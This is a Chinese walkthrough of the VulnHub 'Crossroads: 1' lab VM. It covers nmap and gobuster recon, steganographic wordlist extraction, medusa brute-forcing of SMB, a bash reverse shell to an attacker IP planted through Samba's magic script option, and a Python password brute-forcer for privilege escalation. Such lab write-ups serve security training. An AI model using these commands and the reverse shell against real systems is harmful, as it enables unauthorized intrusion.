准备:

攻击机:虚拟机kali、本机win10。

靶机:Crossroads: 1,下载地址:https://download.vulnhub.com/crossroads/crossroads_vh.ova,下载后直接vbox打开即可。

知识点:stegoveritas工具使用、smb服务扫描、shell反弹、简单脚本编写。

一:信息收集

1.nmap扫描

使用nmap扫描下靶机地址,命令:nmap -sn 192.168.5.0/24,发现靶机地址:192.168.5.159。

使用nmap扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.5.159,显示开放了80端口、139端口、445端口,开启了smb服务、http服务。

2.目录扫描

使用gobuster进行目录扫描,命令:gobuster dir -x php,jpg,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.5.159,发现/robots.txt文件和/note.txt文件。

访问下/robots.txt文件和/note.txt文件,发现提示信息和一张图片信息,访问:http://192.168.5.159/robots.txt和http://192.168.5.159/note.txt。

3.stegoveritas工具使用

将图片下载下来使用隐写工具来查看下是否隐藏有信息,命令:stegoveritas crossroads.png,生成一个新的文件夹:results。

在/result/keep目录下发现一个文件(就是第一个文件名字可能不同)是字典文件,后面会用到,将该文件保存下来后面会用到,别的文件别动,我当时动了之后直接导致这个字典文件没了。

4.smb服务

使用smb服务扫描器:enum4linux对靶机进行扫描,发现一个账户:albert和两个目录:print$、smbshare。

二 :信息利用

1.smb服务利用

登录smb服务时发现需要密码,那就对smb服务进行爆破,命令medusa -h 192.168.5.159 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt,成功获得一组账户密码:bradley1。这里开始使用的是hydra爆破,但是爆破不出来,后来使用win上的一个小工具超级弱口令检测工具能检测出来,不知道hydra检测不出来的原因是什么,然后就百度了一下,找到了medusa工具。

使用获得账户和密码信息连接smb服务,命令:smbclient //192.168.5.159/albert -U albert,在目录信息中发现user.txt文件,下载该文件并读取该文件,成功获得第一个flag值。

2.shell反弹

在smbshare目录下发现一个smb的配置文件:smb.conf,读取该文件发现magic script = smbscript.sh,magic script选项为魔术脚本,这个选项如果被设置了具体文件名,则Samba将在用户打开和关闭文件后立即运行该文件,因此我们直接上传一个名字为smbscript.sh的shell反弹脚本:bash -c 'bash -i >&/dev/tcp/192.168.5.161/6688 0>&1',成功获得shell权限。这里需要smbclient //192.168.5.159/smbshare -U albert从新登录下smb服务,否则无法反弹shell。

3.逆向

将reboot文件下载到本地,然后使用ida工具进行逆向,查看其伪代码,发现是执行了/root/beroot.sh文件。在shell中尝试执行reboot程序,但是需要输入密码。

三:提权

1.脚本编写

用我们之前从图片中发现的字典来进行爆破beroot程序的密码,这里需要写一个脚本上传到靶机中,然后执行我们上传的脚本成功获得密码:#1bitch。

bp.py 
 import subprocess

import os

import time

import sys

path = '/usr/bin/echo'

content = "wrong password!!"

blank = " "

executable = "beroot"

def broot():

        os.system("export TERM=xterm")

        with open("pass","r",encoding="ISO-8859-1") as file:

                    words = file.read().splitlines()   

        for word in words:

                    execute = subprocess.getoutput(path + blank + (str(word)) + " | ./" + executable)

                    print(execute)

                    if content not in execute:

                            print("[!]Password:" + word)

                            sys.exit(0)

broot()

2.提权

执行beroot程序,然后输入我们获得的密码信息:#1bitch,但是显示仍是密码错误,那我们将字典中的该密码删掉,命令:sed -i "s/\#1bitch/ /g" pass,从新跑一下,获得新的密码:lemuel。

告诉我们执行ls可以发现root creds文件,查看下该文件信息成功获得root密码:___drifting___,切换到root账户,然后再/root目录下发现root.txt文件,读取该文件成功获得flag值。

vulnhub靶场之CROSSROADS: 1的更多相关文章

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  3. VulnHub靶场学习_HA: InfinityStones

    HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...

  4. VulnHub靶场学习_HA: Avengers Arsenal

    HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...

  5. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  6. VulnHub靶场学习_HA: Pandavas

    HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...

  7. VulnHub靶场学习_HA: Natraj

    HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...

  8. VulnHub靶场学习_HA: Chakravyuh

    HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...

  9. VulnHub靶场学习_HA:Forensics

    HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...

  10. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

随机推荐

  1. gulp技术:自动化构建工具

    作用:压缩css.js.img,合并文件,改名字,编译sass,拷贝 使用步骤: 1.安装node环境,下一步,下一步,安装C盘: 2.在你的根目录下,在地址栏输入cmd回车: 3.检测node和np ...

  2. vue 项目页面刷新router-view控制

    vue项目开发过程中,需要在页面提交表单信息之后清空还原,即恢复页面初始状态,第一想法就是对当前页面刷新,重新加载. 想起location.reload()方式和this.$router.go(0)方 ...

  3. 原来sed不支持非贪婪匹配

    场景 从GISAID上面批量下载下来的序列id很长,格式如下: 太长了,并且makeblastdb的时候-parse_seqids参数会导致报错,大概是长度太长不符合要求无法处理之类的. 不作处理去掉 ...

  4. IT工具知识-14:如何通过adb操作安卓剪切板?

    1.安装apk 下载地址 2.运行服务(每次重启系统都需要运行一次) adb shell am startservice ca.zgrs.clipper/.ClipboardService 3.设置剪 ...

  5. ant build 报 warning modified in the future

    错误原因:在测试项目时,修改了系统时间,之后保存了文件,再将系统时间改回来,会报这个错误 解决方法:复制改过的文件到记事本,然后回退下文件,再将记事本的内容覆盖下文件,重新build下就可以了.

  6. Nginx重启操作

    1.杀掉Nginx进程 killall nginx 2.启动Nginx /usr/local/openresty/nginx/sbin/nginx -c /usr/local/openresty/ng ...

  7. 【随笔】Java处理异常输出对象Exception,转为String输出

    声明:这段代码也是从网上摘抄的,当时忘记记录地址了,此为转载,勿怪 public static String handleException(Exception e) { StringBuffer m ...

  8. 关于Maven的使用

    Maven基础入门 一.maven是什么 Apache Maven,是一个项目管理及自动构建的工具,有Apache软件基金会所提供. Maven是用Java语言编写的,是一款可以跨平台的软件. Mav ...

  9. Apache Ranger系列七:Hive 和 Spark 执行过程中的文件路径配置

    背景:在使用Ranger鉴权的过程中,要求必须开启impersonation功能(即执行用户与提交用户保持一致,而不是统一代理的hive/spark).但是在执行的过程中,会需要在hdfs存储临时的文 ...

  10. 关于UPD章节学习的一些感想

    课程看到了UDP, 首先了解UDP的原理模型. 服务端,首先是实例QUdpSocket,也就是UDP套接字,然后,需要绑定.绑定一个任意IP地址,分为IPV4和IPV6.自行选择课程中讲解时绑定的是I ...